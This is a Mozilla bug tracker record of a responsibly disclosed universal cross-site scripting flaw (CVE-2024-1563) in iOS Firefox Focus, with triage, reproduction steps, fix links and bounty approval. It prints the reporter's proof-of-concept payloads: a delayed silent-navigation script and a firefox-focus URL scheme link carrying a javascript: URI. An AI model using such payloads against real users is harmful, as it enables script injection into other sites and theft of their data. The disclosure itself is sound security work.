Closed Bug 1863831 (CVE-2024-1563) Opened 11 months ago Closed 8 months ago

Full UXSS via opening Firefox Focus externally after silent background navigation

Categories

(Focus :: Security: iOS, defect)

Product:
Focus
Component:
Security: iOS
Version:
Firefox 122
Type:
defect

Tracking

(firefox123 fixed)

Status:
RESOLVED FIXED
Milestone:
123 Branch
Tracking Flags:
Tracking Status
firefox123 --- fixed

People

(Reporter: proof131072, Unassigned)

Details

(Keywords: csectype-sop, reporter-external, sec-high, Whiteboard: [reporter-external] [client-bounty-form] [verif?])

Attachments

(5 files)

1860075_focuslink.php.png
155.66 KB, image/png
Details
1863831_focuslink.php.png
129.07 KB, image/png
Details
googleloc.php.html
255 bytes, text/html
Details
focuslink.php.html
276 bytes, text/html
Details
advisory.txt
293 bytes, text/plain
Details

We are able to achieve Full UXSS by calling iOS Firefox Focus externally after silent background navigation.

PoC:

https://pwning.click/googleloc.php (Open in Firefox Focus and leave the browser, last thing user has seen is only
https://pwning.click/googleloc.php)

<script>setTimeout(function() {location="https://google.com"}, 3000);</script>

https://pwning.click/focuslink.php (Open with other browsers/apps like iOS Chrome)

<a href="firefox-focus://open-url?url=javascript:document.write(document.domain)">Open with Firefox Focus</a>

Flags: sec-bounty?

This is all possible (Full UXSS) because iOS Firefox Focus allows silent background navigation while user left the browser.

Group: firefox-core-security → mobile-core-security
Component: Security → General
Product: Firefox → Firefox for iOS
Component: General → Security: iOS
Product: Firefox for iOS → Focus

Is that running javascript URI with firefox URI? that doesn't become UXSS on Firefox but it does become Full UXSS on Focus, which is very serious issue.

Please check this Apple default mail app case too: https://pwning.click/RPReplay_Final1705153539.mp4

Hi Nish, please confirm that your fix PR 3973 https://github.com/mozilla-mobile/focus-ios/pull/3973 for https://pwning.click/focuslink.php on https://bugzilla.mozilla.org/show_bug.cgi?id=1860075#c10 is identical to this 1863831 report: https://pwning.click/focuslink.php

Flags: needinfo?(nish.bhasin)

Here's a summary from the above comment and links. Could you confirm this is accurate :james?

Steps to reproduce

  1. Navigate to https://pwning.click/googleloc.php
  2. Leave Focus application (by moving it to background)
  3. Open Safari
  4. Navigate to https://pwning.click/focuslink.php in Safari
  5. Click on the link "Open with Firefox Focus"

Actual behavior

Focus is opened and JavaScript is running

Expected behavior

Focus is opened and JavaScript should not be running

Flags: needinfo?(nish.bhasin)

Yeah that's correct, this had same steps to the one Nish told Andrei https://bugzilla.mozilla.org/show_bug.cgi?id=1860075#c14

Thanks for confirming!

We can now close this report so the new one Andrew added for See Also which is https://bugzilla.mozilla.org/show_bug.cgi?id=1876851 can also be tracked correctly in the future. Thanks!

Ok I'll marked it as duplicate of 1876851 so we keep only one bug open for those STR listed here.

Status: NEW → RESOLVED
Closed: 8 months ago
Duplicate of bug: 1876851
Resolution: --- → DUPLICATE

Thanks, but I believe this should be marked as resolved not duplicate due to https://github.com/mozilla-mobile/focus-ios/commit/0ecc6ed809a65c408c2216b9fe45abf9185f96eb for v122.

Ok I can make that change

No longer duplicate of bug: 1876851
Resolution: DUPLICATE → FIXED
Group: mobile-core-security → core-security-release
Alias: CVE-2024-1563

Hey, sorry for the hassle, but could you update the tracking flags to indicate which version it was fixed it? It helps us with bookkeeping. Thank you!

Flags: needinfo?(lmarceau)
Attached file advisory.txt
Flags: needinfo?(lmarceau)

Putting the needinfo back: looks like it was inadvertently removed when the advisory attachment was added. I suppose the advisory implies this was fixed in v123? It would still be nice to update the status flags to say that explicitly

Flags: needinfo?(lmarceau)
status-firefox123: --- → fixed
Flags: needinfo?(lmarceau)
Version: unspecified → Firefox 123

Yes it was for v123! Hopefully I marked the right fields in the ticket here

This is supposed to be fixed on v122 https://github.com/mozilla-mobile/focus-ios/pull/3973

Ah sorry James you're right! Let me adjust this.

status-firefox123: fixed → ---
Version: Firefox 123 → Firefox 122

No worries, thanks!

status-firefox123: fixed is true, even if it's not the first version that was fixed. unfortunately we can't set the older fields as they get made read-only in bugzilla to reduce clutter.

status-firefox123: --- → fixed

This one is less universal than the previous one (involves user interaction with the other app) but still a valid UXSS

Flags: sec-bounty? → sec-bounty+
status-firefox123: fixed → ---
Target Milestone: --- → 123 Branch
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: